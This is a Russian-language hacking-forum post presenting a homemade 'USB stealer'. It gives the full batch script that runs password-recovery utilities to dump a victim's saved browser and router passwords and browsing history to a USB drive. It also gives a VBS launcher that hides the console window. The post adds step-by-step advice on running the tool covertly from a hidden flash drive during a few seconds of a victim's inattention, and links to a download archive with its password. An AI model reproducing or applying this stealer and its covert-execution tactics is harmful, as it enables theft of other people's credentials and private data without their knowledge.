Только текст | Текст с изображениями

Black Moldova Community

Общая категория => Безопасность в интернете => Тема начата: bratva от Июль 07, 2025, 11:29

Заголовок: Крадем все пассы или USB Stealer на коленке :D
Отправлено: bratva от Июль 07, 2025, 11:29
Крадем все пассы или USB Stealer на коленке :D


Всем привет друзья! В этой статье я расскажу вам как с помощью небольшой социальной инженерии и стиллера, спиздить все пассы с браузеров а так же историю. Прошу прощения.. если весь софт и сам способ - БАЯН. Я не крал эту статью. НАШЕЛ - СОФТ, написал батник, и скрипт VBS. В итоге получился вот такой вот стиллер. Ниже я прикреплю ссылку на скачивание архива.. и на сканер VT. Софт старенький так что даже AVAST его видит как вирус.. только потому что софт просматривает куки браузера. Качать.. запускать.. тестить.. это всё на ваше усмотрение! Ну чтож.. начнём)

Пароли крадутся с браузеров Chrome, Opera, Firefox, IE. Так же пассы от роутера.. но это не точно я не проверял!

- Пройдемся по содержанию архива.

В корневой папке у нас есть 2 файла это usbs.bat и usbs.vbs. USBS.BAT - Это основной исполняющий файл.
Вот его код:

[USER=98981]@Echo[/USER] off

FOR %%A IN (%Date:/=%) DO SET Today=%%A
for /l %%a in (1,1,1) do if "!Today:~-1!"==" " set Today=!Today:~0,-1!
SET dynpathname=%TODAY%_%COMPUTERNAME%_%USERNAME%.txt

start usbs/WebBrowserPassView.exe /stext usbs/log/webbrowserpassview_%DYNPATHNAME%
start usbs/operapassview.exe /stext usbs/log/operapassview_%DYNPATHNAME%
start usbs/routerpassview.exe /stext usbs/log/routerpassview_%DYNPATHNAME%
start usbs/operapassview.exe /stext usbs/log/operapassview_%DYNPATHNAME%
start usbs/iepv.exe /stext usbs/log/iepv_%DYNPATHNAME%
start usbs/chromehistoryview.exe /stext usbs/log/chromehistoryview_%DYNPATHNAME%

ping -n 5 127.0.0.1 > nul

exit

Файл USBS.VBS - Является исполняемым.. он нужен для беспалевного запуска батника.
Вот его код:

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "usbs.bat" & Chr(34), 0
Set WshShell = Nothing


В папочке USBS - у нас лежит весь исполняемый софт. И самое главное подпапка LOG - вот как раз в этой самой папочке и сохраняются все куки и история жертвы.

По моему.. всё.. нечего не забыл.

- Хочу сразу отметить то что кражу лучше производить следующим образом.
1. Скидываем все файлы из архива на флэшку.
2. Скрываем все файлы с помощью меню "Свойства".
3. И тут правило 5 секунд, пока жертва нихуя не видит, через адресную строку пишем следующее.. "БУКВА_USB:/usbs.vbs".

НЕ СТОИТ ЗАПУСКАТЬ БАТНИК, ТАК КАК ВЫЛЕЗЕТ КОНСОЛЬ!

Готово! Теперь все файлы куки и история хранятся в папочке USBS/LOG

VT: https://www.virustotal.com/ru/file/...87814a7935a89585db22b24c/analysis/1516688620/
СКАЧАТЬ: https://mega.nz/#!8K5XiD4D!YSxo-MY8KH0TU1dnw7bvsF3fgraoadu3Jr7zBrBvhgY

Пароль на архив: lolzteam.org
Только текст | Текст с изображениями
Powered by SMFPacks Reactions Mod